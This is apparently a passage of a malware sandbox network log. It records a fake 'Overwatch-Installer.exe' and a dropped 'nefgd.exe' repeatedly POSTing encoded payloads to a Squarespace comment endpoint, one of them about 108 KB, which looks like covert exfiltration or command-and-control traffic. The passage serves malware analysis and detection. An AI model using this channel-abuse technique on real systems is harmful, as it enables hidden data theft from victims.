2024-09-01 20:04:48 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:48 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:48 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVQAefE38Vl1MTRmM2FjNjQ2ZDBjMjIxODQwMTdiNjYxYWY4MWY1; Path=/; Secure Set-Cookie: crumb=BevMAFQLV3uFODYyOGJkY2UyMTk4NzQ4YTNiZWU4MTFlMTQ1N2Ji; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: NatbDx4i/iO22Q3kF Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BevMAFQLV3uFODYyOGJkY2UyMTk4NzQ4YTNiZWU4MTFlMTQ1N2Ji"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	49800	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:48 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:48 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:48 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:49 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:49 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTn64Ifgg7ejNGM2NTllMDI5NmM2ZTZmOTMwZWVkYjdlMWNlN2Ri; Path=/; Secure Set-Cookie: crumb=BXR4cOMncseqMWU5ZGM5NjIwM2M5ZjAxZTViOGRiYmVjYTBlODY3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Ldn3EHBZ/PQYwk7DN Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXR4cOMncseqMWU5ZGM5NjIwM2M5ZjAxZTViOGRiYmVjYTBlODY3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	49801	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:48 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:48 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:48 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:49 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:48 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BWKC5H9D1fI3Yzc3MmI2NzY2OTBmN2M1ZDk4OTQ3NjFiNWIzNjIy; Path=/; Secure Set-Cookie: crumb=BTP_2KkCUCcVOGM4YjgwZjljZWE3YzZhMjkwNmIwMjhjNWY4OGFh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 2VEbt2xk/SkHtxxUp Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BTP_2KkCUCcVOGM4YjgwZjljZWE3YzZhMjkwNmIwMjhjNWY4OGFh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	49802	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:48 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:48 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:48 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 52 55 34 73 68 45 55 6f 41 6d 57 77 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmRU4shEUoAmWwgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:48 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:48 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:48 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:48 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:48 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:48 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:48 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:48 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:49 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:48 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BcaBEI1GQeoHMDlhZTlkMWM1MTIzMjhlOWEzZmI4MjZmNDdmMTcy; Path=/; Secure Set-Cookie: crumb=BQTZEa8-koIuMjRmOTBhZDQ2NmQ0YmE0NTVmZDRmYzA2ZmQ0NWY0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Ot6V4L3I/mp8qKFbd Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQTZEa8-koIuMjRmOTBhZDQ2NmQ0YmE0NTVmZDRmYzA2ZmQ0NWY0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	49803	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:49 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:49 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:49 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:49 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:49 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbbSSiWmvfEEZmU3NTExZmZjYWExYWJlOWVmN2YyYTViODI5Nzc0; Path=/; Secure Set-Cookie: crumb=BV-FzpKS0OQuZGEwMzI5NjZkMGNmNDk2ZjNjYTk1MTI0YmIwMzlh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: WRv8Ju4X/4GWRd7VG Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BV-FzpKS0OQuZGEwMzI5NjZkMGNmNDk2ZjNjYTk1MTI0YmIwMzlh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	49804	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:49 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:49 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:49 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:49 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:49 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BX5qx4EqPdQ2Y2IzMmFkZGZhNjJmNDE0NzYxN2UxMzIxZTNhMjlh; Path=/; Secure Set-Cookie: crumb=BYmNd1jU8Cb-NWY1OGE2Y2FiMjU4NzBiOGVhMmI5OTY5MjcxNjYx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 8GikHCDD/0iCIxq9O Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYmNd1jU8Cb-NWY1OGE2Y2FiMjU4NzBiOGVhMmI5OTY5MjcxNjYx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	49805	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:49 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:50 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:50 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:50 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:50 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZNHUaAPKNo_NDcxYzEwMzI2ZjdjOTU5YTBhYzE3MmI4MmRmZTZi; Path=/; Secure Set-Cookie: crumb=BUFfm85MS1kbYjIwNjhmZGJmYjEzYjA3NTJlODBhMTBiYzFkMTQw; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: br1wC5Sv/o5R0pNKI Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUFfm85MS1kbYjIwNjhmZGJmYjEzYjA3NTJlODBhMTBiYzFkMTQw"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	49806	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
